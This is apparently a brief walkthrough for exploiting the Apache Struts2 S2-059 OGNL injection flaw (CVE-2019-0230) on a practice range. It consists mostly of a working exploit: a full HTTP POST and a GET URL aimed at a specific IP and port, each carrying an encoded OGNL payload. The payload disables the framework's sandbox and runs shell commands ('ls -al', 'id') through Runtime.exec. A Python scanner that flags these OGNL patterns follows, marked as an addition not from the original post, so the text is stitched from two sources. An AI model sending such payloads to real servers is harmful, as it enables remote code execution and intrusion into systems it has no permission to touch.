Struts2-059 Remote Code Execution Vulnerability (CVE-2019-0230)

Find a test environment online; there are ready-made practice ranges, so just start one up.

Capture the request

Modify the PoC

Enter the OGNL expression %{1+4}; it needs to be URL-encoded as %25%7b%31%2b%34%7d%0a

Sending a single POST request like this is enough:

POST /index.action HTTP/1.1
Host: 144.76.229.247:50766
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 583
Origin: http://144.76.229.247:50766
Connection: close
Referer: http://144.76.229.247:50766/index.action
Cookie: JSESSIONID=5A2789AD2201910479CC5592086C250A
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 10.8.14.51
X-Originating-IP: 10.8.14.51
X-Remote-IP: 10.8.14.51
X-Remote-Addr: 10.8.14.51

skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d

Or access it directly via GET:

http://144.76.229.247:50766/index.action?skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec(%27id%27).getInputStream()).useDelimiter(%27%5C%5C%5C%5CA%27)%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A%27%27%2C%23res.print(%23str)%2C%23res.close()%0A%7d
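As an added defensive example (not code from the original post), the Python helper below shows how the URL-encoded OGNL markers used above look to a request scanner: it decodes each parameter of a raw HTTP request and flags values carrying %{ or ${ evaluation syntax, the #_memberAccess sandbox object, or @class@member static references. The pattern list and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed example (not the original post's code). Markers typical of
# S2-059 payloads: evaluation syntax, the OGNL security context, @class@member.
OGNL_MARKERS = {
    "ognl-eval": re.compile(r"[%$]\{"),
    "member-access": re.compile(r"#_memberAccess"),
    "static-ref": re.compile(r"@[\w.]+@\w+"),
}

def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so double-encoded values are caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_query(raw_query: str) -> list:
    """Return (param, decoded_value, [marker names]) for each suspicious parameter."""
    findings = []
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        decoded = decode_fully(value)  # parse_qsl already decoded one layer
        hits = [label for label, rx in OGNL_MARKERS.items() if rx.search(decoded)]
        if hits:
            findings.append((name, decoded, hits))
    return findings

def scan_request(raw_request: str) -> list:
    """Scan the query string and, for form posts, the body of a raw HTTP request."""
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    target = request_line.split(" ")[1] if " " in request_line else ""
    findings = scan_query(target.partition("?")[2])
    if "application/x-www-form-urlencoded" in head.lower():
        findings += scan_query(body)
    return findings

# Constructed sample requests: a benign form post, the %{1+4} probe from the
# write-up, and a sandbox-bypass fragment of the kind S2-059 payloads carry.
BENIGN = "POST /index.action HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nskillName=Java%20Developer"
PROBE = "GET /index.action?skillName=%25%7b%31%2b%34%7d%0a HTTP/1.1\r\nHost: lab\r\n\r\n"
BYPASS = "POST /index.action HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nskillName=%25%7b%23_memberAccess.allowStaticMethodAccess%3Dtrue%7d"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("probe", PROBE), ("bypass", BYPASS)):
        print(label, scan_request(req))
```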

That's about it.
